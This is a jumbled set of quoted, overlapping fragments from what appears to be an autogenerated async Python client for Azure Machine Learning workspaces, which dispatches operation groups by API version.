OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", ":class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspaceFeaturesOperations>` * 2022-01-01-preview: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspaceFeaturesOperations>` * 2022-05-01: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspaceFeaturesOperations>` \"\"\" api_version = self._get_api_version('workspace_features') if api_version", ":class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.BatchEndpointsOperations>` * 2022-02-01-preview: 
:class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.BatchEndpointsOperations>` * 2022-05-01: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.BatchEndpointsOperations>` \"\"\" api_version = self._get_api_version('batch_endpoints') if api_version", "if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DataContainerOperations as OperationClass else: raise ValueError(\"API", "..v2021_10_01.aio.operations import WorkspaceConnectionsOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import WorkspaceConnectionsOperations", "..runhistory.aio.operations import DeleteOperations as OperationClass else: raise ValueError(\"API version {} does not have", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_job_deployment(self): \"\"\"Instance depends on the API version: * 2020-09-01-dataplanepreview:", "operation group 'extensive_model'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def get_operation_status(self): \"\"\"Instance depends", "regenerated. 
# -------------------------------------------------------------------------- from typing import Any, Optional, TYPE_CHECKING from azure.mgmt.core import AsyncARMPipelineClient", "api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import EnvironmentContainersOperations as OperationClass elif api_version == '2022-02-01-preview':", "2022-02-01-preview: :class:`DataVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DataVersionsOperations>` * 2022-05-01: :class:`DataVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DataVersionsOperations>` \"\"\" api_version = self._get_api_version('data_versions') if api_version == '2022-02-01-preview':", "if api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import DataContainersOperations as OperationClass elif api_version ==", "'2022-05-01': from ..v2022_05_01.aio.operations import WorkspaceFeaturesOperations as OperationClass else: raise ValueError(\"API version {} does", "from ..v2022_05_01.aio.operations import PrivateLinkResourcesOperations as OperationClass else: raise ValueError(\"API version {} does not", "2022-02-01-preview: :class:`DataContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DataContainersOperations>` * 2022-05-01: :class:`DataContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DataContainersOperations>` \"\"\" api_version = self._get_api_version('data_containers') if api_version == '2022-02-01-preview':", "Deserializer(self._models_dict(api_version))) @property def compute(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComputeOperations>`", "not have operation group 'component_versions'\".format(api_version)) return OperationClass(self._client, self._config, 
Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def compute(self):", "{} does not have operation group 'datasets_v1'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "'datasets_v1': '1.5.0', 'delete': 'v1.0', 'events': 'v1.0', 'experiments': 'v1.0', 'extensive_model': '1.0.0', 'get_operation_status': '1.5.0', 'metric':", "ValueError(\"API version {} does not have operation group 'component_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "..v2022_05_01.aio.operations import ModelVersionsOperations as OperationClass else: raise ValueError(\"API version {} does not have", "== '2021-10-01': from ..v2021_10_01.aio.operations import VirtualMachineSizesOperations as OperationClass elif api_version == '2022-01-01-preview': from", "== '1.0.0': from ..model_dataplane import models return models elif api_version == 'v1.0': from", "2022-01-01-preview: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspacesOperations>` * 2022-05-01: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspacesOperations>` \"\"\" api_version = self._get_api_version('workspaces') if api_version == '2021-10-01':", "* 2021-10-01: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspaceFeaturesOperations>` * 2022-01-01-preview: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspaceFeaturesOperations>` * 2022-05-01: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspaceFeaturesOperations>` \"\"\" api_version = self._get_api_version('workspace_features')", 
"self._get_api_version('data_versions') if api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import DataVersionsOperations as OperationClass elif api_version", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def workspaces(self): \"\"\"Instance depends on the API", ":param subscription_id: The ID of the target subscription. :type subscription_id: str :param api_version:", "= self._get_api_version('assets') if api_version == '1.0.0': from ..model_dataplane.aio.operations import AssetsOperations as OperationClass else:", "== '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import Operations as OperationClass elif api_version == '2022-05-01': from", "its API version. The api-version parameter sets the default API version if the", "* 2021-10-01-dataplanepreview: :mod:`v2021_10_01_dataplanepreview.models<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.models>` * 2022-01-01-preview: :mod:`v2022_01_01_preview.models<azure.mgmt.machinelearningservices.v2022_01_01_preview.models>` * 2022-02-01-preview: :mod:`v2022_02_01_preview.models<azure.mgmt.machinelearningservices.v2022_02_01_preview.models>` * 2022-05-01: :mod:`v2022_05_01.models<azure.mgmt.machinelearningservices.v2022_05_01.models>` \"\"\"", "on the API version: * 2021-10-01: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatastoresOperations>` * 2022-02-01-preview: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DatastoresOperations>` * 2022-05-01: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DatastoresOperations>`", "config=self._config, **kwargs) super(AzureMachineLearningWorkspaces, self).__init__( api_version=api_version, profile=profile ) @classmethod def _models_dict(cls, api_version): return {k:", 
"Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def temporary_data_references(self): \"\"\"Instance depends on the API version: * 2021-10-01-dataplanepreview:", "as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import BatchEndpointsOperations as OperationClass elif", "'2022-05-01': from ..v2022_05_01.aio.operations import CodeVersionsOperations as OperationClass else: raise ValueError(\"API version {} does", "ModelVersionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ModelVersionsOperations as OperationClass", "str :param profile: A profile definition, from KnownProfiles to dict. :type profile: azure.profiles.KnownProfiles", "on the API version: * v1.0: :class:`MetricOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.MetricOperations>` \"\"\" api_version = self._get_api_version('metric') if api_version", "as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import VirtualMachineSizesOperations as OperationClass elif", "TemporaryDataReferencesOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "sets the default API version if the operation group is not described in", "a particular api-version and/or profile. 
The profile sets a mapping between an operation", "@property def data_containers(self): \"\"\"Instance depends on the API version: * 2022-02-01-preview: :class:`DataContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DataContainersOperations>` *", "@property def registry_management_non_workspace(self): \"\"\"Instance depends on the API version: * v1.0: :class:`RegistryManagementNonWorkspaceOperations<azure.mgmt.machinelearningservices.registry_discovery.aio.operations.RegistryManagementNonWorkspaceOperations>` \"\"\"", "of the Azure clouds (Azure Stack, Azure Government, Azure China, etc.). By default,", "raise ValueError(\"API version {} does not have operation group 'quotas'\".format(api_version)) return OperationClass(self._client, self._config,", "not have operation group 'async_operations'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_deployments(self):", "'2021-10-01': from ..v2021_10_01.aio.operations import WorkspacesOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'assets'\".format(api_version)) return", "= self._get_api_version('async_operations') if api_version == 'v1.0': from ..registry_discovery.aio.operations import AsyncOperationsOperations as OperationClass else:", "group 'dataset_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_controller_v2(self): \"\"\"Instance depends on", "cause incorrect behavior and will be lost if the code is # regenerated.", "version {} does not have operation group 'component_versions'\".format(api_version)) return OperationClass(self._client, 
self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "\"\"\" api_version = self._get_api_version('private_endpoint_connections') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import PrivateEndpointConnectionsOperations as", "api_version == '2021-10-01': from ..v2021_10_01 import models return models elif api_version == '2021-10-01-dataplanepreview':", "..v2022_02_01_preview.aio.operations import EnvironmentContainersOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import EnvironmentContainersOperations", "..v2022_05_01.aio.operations import QuotasOperations as OperationClass else: raise ValueError(\"API version {} does not have", "data_versions(self): \"\"\"Instance depends on the API version: * 2022-02-01-preview: :class:`DataVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DataVersionsOperations>` * 2022-05-01: :class:`DataVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DataVersionsOperations>`", "'2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import UsagesOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations", "== '2022-05-01': from ..v2022_05_01.aio.operations import WorkspaceFeaturesOperations as OperationClass else: raise ValueError(\"API version {}", "..v2021_10_01_dataplanepreview.aio.operations import CodeContainersOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import CodeContainersOperations", "group 'online_endpoints'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def operations(self): \"\"\"Instance depends on", "return models elif api_version == 'v1.0': from ..runhistory import models return models elif", "depends 
on the API version: * 2021-10-01: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ModelVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ModelVersionsOperations>` * 2022-02-01-preview:", "from ..v2022_01_01_preview.aio.operations import QuotasOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import", "else: raise ValueError(\"API version {} does not have operation group 'spans'\".format(api_version)) return OperationClass(self._client,", "'1.5.0', 'metric': 'v1.0', 'migration': '1.0.0', 'models': '1.0.0', 'registry_management_non_workspace': 'v1.0', 'run': 'v1.0', 'run_artifacts': 'v1.0',", "{} does not have operation group 'private_link_resources'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "from ..v2021_10_01 import models return models elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview import", "* 2022-01-01-preview: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspaceConnectionsOperations>` * 2022-05-01: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspaceConnectionsOperations>` \"\"\" api_version = self._get_api_version('workspace_connections') if api_version ==", "else: raise ValueError(\"API version {} does not have operation group 'events'\".format(api_version)) return OperationClass(self._client,", "ValueError(\"API version {} does not have operation group 'data_call'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "api_version == '2021-10-01': from ..v2021_10_01.aio.operations import 
BatchDeploymentsOperations as OperationClass elif api_version == '2022-02-01-preview':", "import UsagesOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "* 2021-10-01: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.CodeContainersOperations>` * 2021-10-01-dataplanepreview: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.CodeContainersOperations>` * 2022-02-01-preview: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.CodeContainersOperations>` * 2022-05-01: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.CodeContainersOperations>` \"\"\"", "reserved. # Licensed under the MIT License. See License.txt in the project root", "* 2022-01-01-preview: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspacesOperations>` * 2022-05-01: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspacesOperations>` \"\"\" api_version = self._get_api_version('workspaces') if api_version ==", "2020-09-01-dataplanepreview: :class:`BatchJobEndpointOperations<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.aio.operations.BatchJobEndpointOperations>` \"\"\" api_version = self._get_api_version('batch_job_endpoint') if api_version == '2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview.aio.operations import", "group 'data_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_version(self): \"\"\"Instance depends on", "from ..v2021_10_01.aio.operations import WorkspacesOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations 
import", "ValueError(\"API version {} does not have operation group 'data_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "'migration'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def model_containers(self): \"\"\"Instance depends on the", "class _SDKClient(object): def __init__(self, *args, **kwargs): \"\"\"This is a fake class to support", "OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import CodeVersionsOperations as OperationClass else: raise", "depends on the API version: * 2021-10-01: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComputeOperations>` * 2022-01-01-preview: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.ComputeOperations>` * 2022-05-01:", "OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ComponentContainersOperations as OperationClass elif api_version", "Deserializer(self._models_dict(api_version))) @property def batch_job_deployment(self): \"\"\"Instance depends on the API version: * 2020-09-01-dataplanepreview: :class:`BatchJobDeploymentOperations<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.aio.operations.BatchJobDeploymentOperations>`", "WorkspaceConnectionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import WorkspaceConnectionsOperations as OperationClass", "Deserializer(self._models_dict(api_version))) @property def online_endpoints(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.OnlineEndpointsOperations>`", "return OperationClass(self._client, self._config, 
Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def operations(self): \"\"\"Instance depends on the API", "operation group 'delete'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def environment_containers(self): \"\"\"Instance depends", "implemetation of MultiApiClientMixin.\" Will be removed in final version of multiapi azure-core based", "..v2022_01_01_preview.aio.operations import UsagesOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import UsagesOperations", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_call(self): \"\"\"Instance depends on the API", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_container(self): \"\"\"Instance depends on the API version: * 1.5.0:", "raise ValueError(\"API version {} does not have operation group 'dataset_controller_v2'\".format(api_version)) return OperationClass(self._client, self._config,", "on the API version: * v1.0: :class:`AsyncOperationsOperations<azure.mgmt.machinelearningservices.registry_discovery.aio.operations.AsyncOperationsOperations>` \"\"\" api_version = self._get_api_version('async_operations') if api_version", "\"\"\" api_version = self._get_api_version('spans') if api_version == 'v1.0': from ..runhistory.aio.operations import SpansOperations as", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def usages(self): \"\"\"Instance depends on the API version: *", "API version: * 2021-10-01: :class:`DatasetContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatasetContainersOperations>` \"\"\" api_version = 
self._get_api_version('dataset_containers') if api_version == '2021-10-01':", "* 2022-02-01-preview: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.BatchEndpointsOperations>` * 2022-05-01: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.BatchEndpointsOperations>` \"\"\" api_version = self._get_api_version('batch_endpoints') if api_version ==", "as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ComponentContainersOperations as OperationClass else:", "* 2021-10-01: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatastoresOperations>` * 2022-02-01-preview: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DatastoresOperations>` * 2022-05-01: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DatastoresOperations>` \"\"\" api_version = self._get_api_version('datastores')", "API version: * v1.0: :class:`EventsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.EventsOperations>` \"\"\" api_version = self._get_api_version('events') if api_version == 'v1.0':", ":class:`BatchJobDeploymentOperations<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.aio.operations.BatchJobDeploymentOperations>` \"\"\" api_version = self._get_api_version('batch_job_deployment') if api_version == '2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview.aio.operations import BatchJobDeploymentOperations", "version: * 2021-10-01: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComponentContainersOperations>` * 2021-10-01-dataplanepreview: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ComponentContainersOperations>` * 2022-02-01-preview: 
:class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ComponentContainersOperations>` * 2022-05-01: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComponentContainersOperations>`", "Deserializer(self._models_dict(api_version))) @property def component_versions(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComponentVersionsOperations>`", "ValueError(\"API version {} does not have operation group 'compute'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def get_operation_status(self): \"\"\"Instance depends on the API version: *", "def close(self): await self._client.close() async def __aenter__(self): await self._client.__aenter__() return self async def", "# pylint: disable=unused-import,ungrouped-imports from azure.core.credentials import TokenCredential from azure.core.credentials_async import AsyncTokenCredential class _SDKClient(object):", ":class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.PrivateLinkResourcesOperations>` * 2022-05-01: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.PrivateLinkResourcesOperations>` \"\"\" api_version = self._get_api_version('private_link_resources') if api_version == '2021-10-01': from", "else: raise ValueError(\"API version {} does not have operation group 'component_containers'\".format(api_version)) return OperationClass(self._client,", "from ..runhistory.aio.operations import RunArtifactsOperations as OperationClass else: raise ValueError(\"API version {} does not", "elif api_version == '2022-05-01': from 
..v2022_05_01.aio.operations import UsagesOperations as OperationClass else: raise ValueError(\"API", "* v1.0: :class:`RunArtifactsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunArtifactsOperations>` \"\"\" api_version = self._get_api_version('run_artifacts') if api_version == 'v1.0': from ..runhistory.aio.operations", "OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ModelVersionsOperations as OperationClass elif api_version", ":param profile: A profile definition, from KnownProfiles to dict. :type profile: azure.profiles.KnownProfiles :keyword", "\"\"\" api_version = self._get_api_version('events') if api_version == 'v1.0': from ..runhistory.aio.operations import EventsOperations as", "..v2022_05_01.aio.operations import WorkspaceFeaturesOperations as OperationClass else: raise ValueError(\"API version {} does not have", "from ..runhistory.aio.operations import DeleteOperations as OperationClass else: raise ValueError(\"API version {} does not", "OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import WorkspacesOperations as OperationClass else: raise", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'private_link_resources'\".format(api_version))", "support current implemetation of MultiApiClientMixin.\" Will be removed in final version of multiapi", "version: * 1.5.0: :class:`DataContainerOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataContainerOperations>` \"\"\" api_version = self._get_api_version('data_container') if api_version == '1.5.0': from", "ModelContainersOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ModelContainersOperations as OperationClass", "api_version == '2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview import models return models elif api_version == 
'2021-10-01':", "operation group 'get_operation_status'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def jobs(self): \"\"\"Instance depends", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def spans(self): \"\"\"Instance depends on the API version: * v1.0:", "== '2021-10-01': from ..v2021_10_01.aio.operations import WorkspaceFeaturesOperations as OperationClass elif api_version == '2022-01-01-preview': from", "api_version == '2022-05-01': from ..v2022_05_01.aio.operations import PrivateEndpointConnectionsOperations as OperationClass else: raise ValueError(\"API version", "if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DeleteOperations as OperationClass elif api_version ==", "import models return models elif api_version == 'v1.0': from ..registry_discovery import models return", "operation group 'data_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_containers(self): \"\"\"Instance depends", "'2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import DataContainersOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations", "version: * 1.5.0: :class:`DatasetV2Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetV2Operations>` \"\"\" api_version = self._get_api_version('dataset_v2') if api_version == '1.5.0': from", "v1.0: :class:`MetricOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.MetricOperations>` \"\"\" api_version = self._get_api_version('metric') if api_version == 'v1.0': from ..runhistory.aio.operations import", "ValueError(\"API version {} does not have operation group 'delete'\".format(api_version)) 
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", ":class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.OnlineEndpointsOperations>` * 2022-05-01: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.OnlineEndpointsOperations>` \"\"\" api_version = self._get_api_version('online_endpoints') if api_version == '2021-10-01': from", "Any, Optional, TYPE_CHECKING from azure.mgmt.core import AsyncARMPipelineClient from azure.profiles import KnownProfiles, ProfileDefinition from", "as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import BatchEndpointsOperations as OperationClass else:", ":class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DatastoresOperations>` \"\"\" api_version = self._get_api_version('datastores') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import DatastoresOperations", "\"\"\" api_version = self._get_api_version('models') if api_version == '1.0.0': from ..model_dataplane.aio.operations import ModelsOperations as", "raise ValueError(\"API version {} does not have operation group 'events'\".format(api_version)) return OperationClass(self._client, self._config,", "{} does not have operation group 'dataset_v2'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'environment_versions'\".format(api_version))", "ValueError(\"API version {} does not have operation group 'metric'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "else: raise ValueError(\"API version {} does not have operation group 'dataset_versions'\".format(api_version)) return 
OperationClass(self._client,", "have operation group 'get_operation_status'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def jobs(self): \"\"\"Instance", "2022-01-01-preview: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspaceConnectionsOperations>` * 2022-05-01: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspaceConnectionsOperations>` \"\"\" api_version = self._get_api_version('workspace_connections') if api_version == '2021-10-01':", "\"\"\" api_version = self._get_api_version('environment_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import EnvironmentVersionsOperations as", "OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import BatchDeploymentsOperations as OperationClass elif api_version", "elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import BatchDeploymentsOperations as OperationClass elif api_version ==", "not have operation group 'component_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def component_versions(self):", "self._get_api_version('assets') if api_version == '1.0.0': from ..model_dataplane.aio.operations import AssetsOperations as OperationClass else: raise", "OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import CodeVersionsOperations as OperationClass elif api_version", "* 1.0.0: :class:`AssetsOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.AssetsOperations>` \"\"\" api_version = self._get_api_version('assets') if api_version == '1.0.0': from 
..model_dataplane.aio.operations", "API version. The api-version parameter sets the default API version if the operation", "OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import ComputeOperations as OperationClass elif api_version", "**kwargs): \"\"\"This is a fake class to support current implemetation of MultiApiClientMixin.\" Will", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def model_containers(self): \"\"\"Instance depends on the API version: * 2021-10-01:", "'2022-05-01': from ..v2022_05_01.aio.operations import OnlineDeploymentsOperations as OperationClass else: raise ValueError(\"API version {} does", "if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import OnlineEndpointsOperations as OperationClass elif api_version ==", "{} does not have operation group 'dataset_controller_v2'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "._configuration import AzureMachineLearningWorkspacesConfiguration if TYPE_CHECKING: # pylint: disable=unused-import,ungrouped-imports from azure.core.credentials import TokenCredential from", "is not described in the profile. 
:param credential: Credential needed for the client", "OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import PrivateLinkResourcesOperations as OperationClass else: raise", "ValueError(\"API version {} does not have operation group 'async_operations'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", ":class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.PrivateEndpointConnectionsOperations>` * 2022-05-01: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.PrivateEndpointConnectionsOperations>` \"\"\" api_version = self._get_api_version('private_endpoint_connections') if api_version == '2021-10-01': from", "..dataset_dataplane.aio.operations import DatasetsV1Operations as OperationClass else: raise ValueError(\"API version {} does not have", "self._get_api_version('get_operation_status') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import GetOperationStatusOperations as OperationClass else: raise", "return models elif api_version == '1.0.0': from ..model_dataplane import models return models elif", "version: * 2021-10-01: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.BatchEndpointsOperations>` * 2022-02-01-preview: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.BatchEndpointsOperations>` * 2022-05-01: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.BatchEndpointsOperations>` \"\"\" api_version =", ":class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.EnvironmentContainersOperations>` * 2022-02-01-preview: 
